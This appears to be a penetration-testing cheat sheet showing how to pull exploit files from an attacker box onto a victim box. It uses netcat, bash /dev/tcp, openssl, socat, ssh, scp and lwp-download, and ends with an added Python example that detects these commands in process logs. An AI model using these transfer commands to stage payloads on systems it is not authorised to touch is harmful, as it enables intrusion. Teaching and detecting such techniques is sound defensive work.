netcat download
We start a listener on the attacking machine that serves the file we want to transfer.
Attacker Box:
sam@ubuntu:~$ nc -l -p 8888 < "exploit.tar"
sam@ubuntu:~$
Next we issue the command below to download the file to the victim machine.
Victim Box:
user@debian:~$ nc 192.168.155.138 8888 > "exp.tar"
user@debian:~$
bash fetch file
We set up a netcat listener on the attack box on port 8888, serving the file we want to transfer.
Attacker Box:
sam@ubuntu:~$ nc -l -p 8888 < "exploit.c"
Next on the victim box we issue the bash command and write to an output file 'exp.c'.
Victim Box:
user@debian:~$ bash -c 'cat < /dev/tcp/192.168.155.129/8888 > exp.c'
openssl file download
First we need to create a key and certificate on our attacker box to pass to our openssl server. This is accomplished by the command below:
sam@asus:/tmp% openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a 4096 bit RSA private key
...................++
...........++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
sam@asus:/tmp%
sam@asus:/tmp% ls -l
total 24
-rw-rw-r-- 1 sam sam 15 Jan 20 20:41 exploit.c
-rw-rw-r-- 1 sam sam 1919 Jan 20 20:59 cert.pem
-rw-rw-r-- 1 sam sam 3268 Jan 20 20:59 key.pem
sam@asus:/tmp%
We now have two 'pem' files we can use when we set up the openssl server. Now we can start the openssl server listening on port '8888'.
Attacker Box:
sam@asus:/tmp% openssl s_server -key key.pem -cert cert.pem -port 8888 < exploit.c
Using default temp DH parameters
ACCEPT
Once we start the server, we move on to the victim box and issue the command to download the file:
Victim Box:
user@debian:~$ openssl s_client -connect 192.168.155.129:8888 > "exp.c"
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify error:num=18:self signed certificate
verify return:1
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify return:1
read:errno=0
user@debian:~$
user@debian:~$ ls
exp.c
user@debian:~$
socat file download
First we start a socat listener on the attack box for the victim to connect to.
Attacker Box:
sam@ubuntu:~$ socat -u file:exploit.tar tcp-listen:8888,reuseaddr
On the victim box we issue the following command to download the file locally.
Victim Box:
user@debian:~$ socat -u tcp-connect:192.168.155.138:8888 open:exp.tar,creat
user@debian:~$ ls
exp.tar
user@debian:~$
ssh file download
Here we can use SSH to download a file to the victim box.
Victim Box:
user@debian:~$ ssh sam@192.168.155.129 "cat /home/sam/exploit.c" > /tmp/exp.c
sam@192.168.155.129's password:
user@debian:~$ ls /tmp
exp.c
user@debian:~$
scp file download
We can transfer a file to the victim box with scp.
Victim Box:
user@debian:~$ scp sam@192.168.155.129:~/exploit.tar exp.tar
sam@192.168.155.129's password:
exploit.tar 100% 0 0.0KB/s 00:00
user@debian:~$
LWP download
We can use the 'lwp-download' utility, which comes by default with a Perl installation, to download a file to the victim machine.
Victim Box:
user@debian:~$ lwp-download http://192.168.155.129/~sam/exploit.sh exp.sh
1.66 KB received
user@debian:~$
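Seen from the monitored host, each of the transfers above leaves a recognisable command line in process-execution logs. The following Python detection logic is an added example, not part of the original post: the (host, command line) event format, the function names and the technique labels are assumptions, and the sample events are constructed from the commands on this page.

```python
import re
import shlex

LISTEN_FLAG = re.compile(r"-[a-zA-Z]*l[a-zA-Z]*")           # -l, -lvp, -nlp ...
SOCAT_TCP = re.compile(r"(?i)tcp[46]?(-connect|-listen)?:")  # socat TCP addresses

def classify(cmdline):
    """Map one logged command line to a transfer technique name, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes in a truncated log field
        argv = cmdline.split()
    if not argv:
        return None
    prog, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    if prog in ("nc", "ncat", "netcat"):
        # Any nc run without a listen flag is treated as an outbound connect.
        listening = any(LISTEN_FLAG.fullmatch(a) for a in args)
        return "netcat-listen" if listening else "netcat-connect"
    if prog == "bash" and any("/dev/tcp/" in a for a in args):
        return "bash-dev-tcp"
    if prog == "openssl" and args[:1] in (["s_client"], ["s_server"]):
        return "openssl-" + args[0]
    if prog == "socat" and any(SOCAT_TCP.match(a) for a in args):
        return "socat-tcp"
    if prog == "lwp-download":
        return "lwp-download"
    return None                   # ssh/scp left out: too common to flag by name

def scan(events):
    """Return (host, technique, cmdline) for every event that matches."""
    tagged = ((h, classify(c), c) for h, c in events)
    return [t for t in tagged if t[1]]

# Constructed sample events (host, command line) modelled on this page.
# Redirections such as "> exp.tar" are done by the shell and never reach
# exec logs, so only the "bash -c" string still carries its redirect.
SAMPLE_EVENTS = [
    ("debian", "nc 192.168.155.138 8888"),
    ("debian", "bash -c 'cat < /dev/tcp/192.168.155.129/8888 > exp.c'"),
    ("debian", "openssl s_client -connect 192.168.155.129:8888"),
    ("debian", "openssl x509 -in cert.pem -noout -text"),
    ("debian", "socat -u tcp-connect:192.168.155.138:8888 open:exp.tar,creat"),
    ("debian", "lwp-download http://192.168.155.129/~sam/exploit.sh exp.sh"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(*hit, sep="\t")
```

The ssh and scp transfers are not matched by name because they are routine administration; those are better reviewed through destination and account baselines.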